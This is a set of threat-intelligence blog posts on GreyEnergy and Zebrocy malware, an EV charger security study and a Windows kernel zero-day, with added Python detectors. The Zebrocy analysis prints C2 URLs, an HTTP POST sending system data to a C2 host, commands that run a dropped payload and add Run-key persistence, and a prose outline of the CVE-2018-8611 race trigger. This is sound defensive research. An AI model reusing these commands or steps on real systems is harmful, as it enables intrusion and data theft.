a5cbf5a131e84cd2c0a11fca5ddaa50a
c9e1b0628ac62e5cb01bf1fa30ac8317

The URL used to download additional data looks as follows:

hxxp://193.23.181[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}

This same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a FireEye report. Details on this attachment are as follows:

  • The file (11227eca89cc053fb189fac3ebf27497) with the name “Seminar.rtf” exploited CVE-2017-0199
  • “Seminar.rtf” downloaded a second stage document from: hxxp://193.23.181[.]151/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)
  • The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://193.23.181[.]151/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf

Another server we detected that was used both by Zebrocy and by GreyEnergy is 185.217.0[.]124. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named “Seminar.rtf”.

“Seminar.rtf”, a GreyEnergy decoy document

This document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:

\\185.217.0[.]124\Doc\Seminar\Seminar_2018_1.AO-A

The following Zebrocy samples use this server as C2:

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
3803af6700ff4f712cd698cee262d4ac
e3100228f90692a19f88d9acb620960d

They retrieve additional data from the following URL:

hxxp://185.217.0[.]124/help-desk/remote-assistant-service/PostId.php?q={hex}

It is worth noting that at least two samples from the above list use both 193.23.181[.]151 and 185.217.0[.]124 as C2s.

Hosts associated with GreyEnergy and Zebrocy

Attacked company

Additionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.

GreyEnergy and Zebrocy overlap

Attack timeframe

A spearphishing document entitled ‘Seminar.rtf’, which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:

‘(28.06.18) Izmeneniya v prikaz PK.doc’ Zebrocy decoy document translation:
‘Changes to order, Republic of Kazakhstan’

The two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:

  • 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018
  • 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018

Conclusions

The GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge of penetrating its victims’ networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.

Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship’s existence.

For more information about APT reports please contact: intelreports@kaspersky.com

For more information about ICS threats please contact: ics-cert@kaspersky.com

January 11, 2019

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented that this same Go downloader and the same C2 were used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new Middle Eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining PowerShell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, one attachment was named “30-144.arj”, a compressed archive in an older archiver format handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader was also delivered with a new spearphishing object that rolls up multiple layers of LNK file, PowerShell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5 MB, written to disk and launched by a PowerShell script. So the attachment that arrived over email was large. The PowerShell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed by the opening of an identically named decoy Word document with "WINWORD.EXE" /n "***\30-276(pril).docx" /o. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Almost all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of PowerShell script and base64 encoded content is an unusual implementation – contents from a couple are listed in the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), and base64 decodes the content, which yields another layer of the same PowerShell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.
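A triage check for the shortcut layout described above, as an added example that is not code from the original report: it confirms the Shell Link header, then locates the longest embedded base64 run and reports its offset and share of the file. The 64 KB size threshold, the 256-character minimum run and the sample bytes are assumptions constructed for illustration.

```python
import base64
import re
import struct

LNK_HEADER_SIZE = 0x4C  # fixed ShellLinkHeader size
# LinkCLSID 00021401-0000-0000-C000-000000000046 in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# Assumption: 256+ consecutive base64 characters is far more than a path or
# argument string in an ordinary shortcut would contain.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{256,}={0,2}")


def is_shell_link(data):
    """True when the buffer starts with a valid Shell Link (.lnk) header."""
    return (len(data) >= 20
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def longest_base64_run(data):
    """Return (start, end) of the longest base64-looking run, or None."""
    best = max(B64_RUN.finditer(data), key=lambda m: m.end() - m.start(), default=None)
    return (best.start(), best.end()) if best else None


def triage_lnk(data, max_normal_size=64 * 1024):
    """Describe a shortcut and flag it when it carries an embedded payload."""
    report = {"is_lnk": is_shell_link(data), "size": len(data),
              "oversized": len(data) > max_normal_size, "blob": None}
    span = longest_base64_run(data)
    if span:
        start, end = span
        report["blob"] = {
            "offset": start,
            "length": end - start,
            "share": (end - start) / len(data),
            # Decode only the first 64 characters (48 bytes) as an analyst preview.
            "preview": base64.b64decode(data[start:start + 64]),
        }
    blob_dominates = report["blob"] is not None and report["blob"]["share"] > 0.5
    report["suspicious"] = report["is_lnk"] and (report["oversized"] or blob_dominates)
    return report


# Constructed samples: a 76-byte header, filler, then a base64 blob of inert text.
HEADER = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + b"\x00" * 56
SAMPLE_BLOB = base64.b64encode(b"# constructed inner layer (inert text)\n" * 3000)
SAMPLE_LNK = HEADER + b"\x00" * 100 + SAMPLE_BLOB
PLAIN_LNK = HEADER + b"\x00" * 500

if __name__ == "__main__":
    for name, sample in (("embedded", SAMPLE_LNK), ("plain", PLAIN_LNK)):
        r = triage_lnk(sample)
        print(name, r["size"], r["suspicious"], r["blob"] and r["blob"]["offset"])
```

The reported offset and length give an analyst the same byte range the embedded script would read, so the blob can be carved and inspected without opening the shortcut.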

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe
and adds a run key persistence entry with the system utility reg.exe:
cmd /C "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f"
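Detection logic for the two behaviours described above, as an added example that is not part of the original report: it flags proxy records where the default Go user-agent, a bare-IP Host header and a POST to a .php endpoint coincide, and process command lines that add an HKCU Run value pointing into a user-writable directory. The log records are constructed, and the three-signal threshold and the directory list are assumptions.

```python
import ipaddress
import re

# Constructed proxy records (method, host, path, user-agent). Only the second
# mirrors the request quoted in the article, with its id masked as it is there.
PROXY_RECORDS = [
    ("GET", "updates.example", "/modules/list", "Go-http-client/1.1"),
    ("POST", "89.37.226.148",
     "/technet-support/library/online-service-description.php?id_name=345XXXD5",
     "Go-http-client/1.1"),
    ("POST", "192.0.2.10", "/api/v1/upload", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
    ("POST", "intranet.example", "/metrics", "Go-http-client/1.1"),
]

# Constructed process-creation command lines; the second mirrors the article.
PROCESS_RECORDS = [
    r'reg add HKLM\SOFTWARE\Vendor\App /v Installed /t REG_DWORD /d 1 /f',
    r'cmd /C "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d '
    r'c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f"',
    r'reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run',
]

RUN_KEY_ADD = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?:HKCU|HKEY_CURRENT_USER)\\Software\\Microsoft\\Windows'
    r'\\CurrentVersion\\Run"?\s.*?/d\s+"?(?P<target>[^"]+?\.exe)',
    re.IGNORECASE)
# Assumption: directories a standard user can write to without elevation.
USER_WRITABLE = re.compile(r'\\appdata\\|\\programdata\\|\\temp\\', re.IGNORECASE)


def is_ip_literal(host):
    """True when the Host value is an IP address (optionally IPv4 with a port)."""
    candidate = host.strip("[]")
    if candidate.count(":") == 1:
        candidate = candidate.split(":")[0]
    try:
        ipaddress.ip_address(candidate)
        return True
    except ValueError:
        return False


def http_findings(method, host, path, user_agent):
    """List the weak signals present; none is conclusive on its own, since
    plenty of legitimate tooling also sends the default Go user-agent."""
    reasons = []
    if user_agent.startswith("Go-http-client/"):
        reasons.append("default Go user-agent")
    if is_ip_literal(host):
        reasons.append("Host header is a bare IP")
    if method == "POST" and path.split("?")[0].lower().endswith(".php"):
        reasons.append("POST to a .php endpoint")
    return reasons


def suspicious_http(records, threshold=3):
    """Keep only records where all of the weak signals coincide."""
    return [r for r in records if len(http_findings(*r)) >= threshold]


def run_key_findings(cmdline):
    """Return the Run-key target of a 'reg add' command line, or None."""
    m = RUN_KEY_ADD.search(cmdline)
    if not m:
        return None
    target = m.group("target")
    return {"target": target, "user_writable": bool(USER_WRITABLE.search(target))}


if __name__ == "__main__":
    for rec in suspicious_http(PROXY_RECORDS):
        print("HTTP:", rec[1], rec[2])
    for line in PROCESS_RECORDS:
        hit = run_key_findings(line)
        if hit and hit["user_writable"]:
            print("RUN KEY:", hit["target"])
```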

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7]
Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly, the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list:
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers, run in “qhoster[.]com”, can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more, although it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods.

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

January 10, 2019

The world’s southernmost security conference

When asked about his best race, Ayrton Senna replied that it was when he raced karting cars. For him it was the best because it was only for the sake of sports and free from commercial sponsoring and commercial interests. I have this same feeling about computer security conferences, because they attract people who really seek knowledge, both to receive and to share it.

In November I had the privilege of participating in a conference that can rightfully be labelled the world’s southernmost. It is called “Patagonia Hacking” and it is organized in the Chilean city of Punta Arenas: https://www.patagoniasec.cl

This event develops in two days – the first is dedicated to workshops, and the second is for presentations to the attendants. On my part, I had the opportunity to present two topics, one each day. On the day dedicated to conferences, my topic was the “Black Box” attacks against financial institutions in Latin America – a phenomenon that has become a fearful reality for the banks in the region.

Although the event took place in a remote city, attendants included enthusiasts from all over the world. There also were some Latin American speakers.

Despite the low temperatures and strong winds, the event’s welcome was very warm. It was very pleasant meeting the region’s new experts and sharing with them during those busy days.

The third edition of the event took place this year. If you plan to participate next year, apart from the conference, you should try the traditional lamb meat, Calafate beer and Calafate’s pisco sour, as well as making time to visit the Strait of Magellan Park which includes Fort Bulnes.

P.S. A curious fact – it seems that the southernmost city with Uber also happens to be Punta Arenas.

December 13, 2018

Remotely controlled EV home chargers – the threats and vulnerabilities

We are now seeing signs of a possible shift in the field of personal transport. Recent events such as the ‘dieselgate’ scandal undermine customer and government confidence in combustion engines and their environmental safety. At the same time there has been a big step forward in the development of electric vehicles. In addition to favorable media coverage, modern EVs have evolved a lot in terms of battery endurance, driving speeds and interior and exterior design.

To stimulate growth in the personal EV segment some countries even have special tax relief programs for EV owners. But there is still a major problem – the lack of charging infrastructure. This may not be as relevant in big cities, but in other places car owners mostly rely on their own home EV chargers, a relatively new class of device that has attracted our attention.

There are lots of home charger vendors. Some of them, such as ABB or GE, are well-known brands, but some smaller companies have to add ‘bells and whistles’ to their products to attract customers. One of the most obvious and popular options in this respect is remote control of the charging process. But from our point of view this sort of improvement can make chargers an easy target for a variety of attacks. To prove it we decided to take one of them, ChargePoint Home made by ChargePoint, Inc., and conduct some in-depth security research.

ChargePoint Home supports both Wi-Fi and Bluetooth wireless technologies. The end user can remotely control the charging process with a mobile application available for both iOS and Android platforms. All that’s needed is to register a new account in the application, connect a smartphone to the device via Bluetooth, set the parameters of a Wi-Fi network for an internet connection, and finish the registration process by sending the created user ID and the smartphone’s GPS coordinates to the backend from the device.

In a registered state, the device establishes a connection to the remote backend server, which is used to transfer the user’s commands from the application. The application thereby makes it possible to remotely change the maximum consumable current and to start and stop the charging process.

To explore the registration data flows in more detail, we used a rooted smartphone with the hcidump application installed. With this application, we were able to make a dump of the whole registration process, which can later be viewed in Wireshark.

The Bluetooth interface is only used during the registration phase and disabled afterwards. But we found another, rather unusual wireless communication channel that is implemented by means of photodiode on the device side and photoflash on the smartphone side. It seems to have just one purpose: by playing a special blinking pattern on the flash, the application can trigger the factory reset process after the device’s next reboot. During the reboot, Wi-Fi settings and registered user information will be wiped.

In addition, we found a web server with enabled CGI on the device. All web server communications are protected by the SSL protocol with the same scheme as the control server, so the web server inherits the described certificate security issue. We discovered a series of vulnerabilities in CGI binaries that can be used by an intruder to gain control of the device. Two of them were found in the binary used to upload files in different folders to the device depending on the query string parameters. Other vulnerabilities (stack buffer overflow) were found in the binary used to send different commands to the charger in the vendor-specific format (included in a POST message body). We also found the same stack buffer overflow vulnerabilities in the other binary used for downloading different system logs from the device. All this presents attackers with an opportunity to control the charging process by connecting to the target’s Wi-Fi network.

Vulnerabilities in the Bluetooth stack were also found, but they are all minor due to the limited use of Bluetooth during regular device operation.

We can see two major capabilities an intruder can gain from a successful attack. They will be able to:

  • Adjust the maximum current that can be consumed during charging. As a result, an attacker can temporarily disable parts of the user’s home electrical system or even cause physical damage – for example, if the device is not connected properly, a fire could start due to wires overheating.
  • Stop a car’s charging process at any time, for example, restricting an EV owner’s ability to drive where they need to, and even cause financial losses.

We sent all our findings to ChargePoint, Inc. The vulnerabilities we discovered have already been patched, but the question remains as to whether there is any reason to implement wireless interfaces when there is no real need for them. The benefits they bring are often outweighed by the security risks they add.

Download “ChargePoint Home security research” (English, PDF)

December 12, 2018

Zero-day in Windows Kernel Transaction Manager (CVE-2018-8611)

Executive summary

In October 2018, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis led us to uncover a zero-day vulnerability in ntoskrnl.exe. We reported it to Microsoft on October 29, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8611. Microsoft just released a patch, part of its December update, crediting Kaspersky Lab researchers Boris Larin (Oct0xor) and Igor Soumenkov (2igosha) with the discovery.

This is the third consecutive exploited Local Privilege Escalation vulnerability in Windows we discovered this autumn using our technologies. Unlike the previously reported vulnerabilities in win32k.sys (CVE-2018-8589 and CVE-2018-8453), CVE-2018-8611 is an especially dangerous threat – a vulnerability in the Kernel Transaction Manager driver. It can also be used to escape the sandbox in modern web browsers, including Chrome and Edge, since syscall filtering mitigations do not apply to ntoskrnl.exe system calls.

Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to this zero-day and CHAINSHOT, SandCat also uses the FinFisher / FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

Brief details – CVE-2018-8611 vulnerability

CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.

This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.

We have found multiple builds of the exploit for this vulnerability. The latest build includes changes to reflect the latest versions of the Windows OS.

A check for the latest build at the time of discovery: Windows 10 Redstone 4 Build 17133

Similarly to CHAINSHOT, this exploit heavily relies on the use of C++ exception handling mechanisms with custom error codes.

To abuse this vulnerability, the exploit first creates a named pipe and opens it for read and write. Then it creates a pair of new transaction manager objects, resource manager objects and transaction objects, and creates a large number of enlistment objects for what we will call “Transaction #2”. An enlistment is a special object that is used for association between a transaction and a resource manager. When the transaction state changes, the associated resource manager is notified by the KTM. After that, it creates one more enlistment object, only now it does so for “Transaction #1”, and commits all the changes made during this transaction.
After all the initial preparations have been made, the exploit proceeds to the second part of the vulnerability trigger. It creates multiple threads and binds them to a single CPU core. One of the created threads calls NtQueryInformationResourceManager in a loop, while a second thread tries to execute NtRecoverResourceManager once. But the vulnerability itself is triggered in the third thread. This thread uses the trick of executing NtQueryInformationThread to obtain information on the latest executed syscall for the second thread. Successful execution of NtRecoverResourceManager will mean that the race condition has occurred, and further execution of WriteFile on the previously created named pipe will lead to memory corruption.


Proof of concept: execution of WriteFile with buffer set to 0x41

As always, we provided Microsoft with a proof of concept for this vulnerability, along with source code. And it was later shared through Microsoft Active Protections Program (MAPP).

More information about SandCat, FruityArmor and CVE-2018-8611 is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com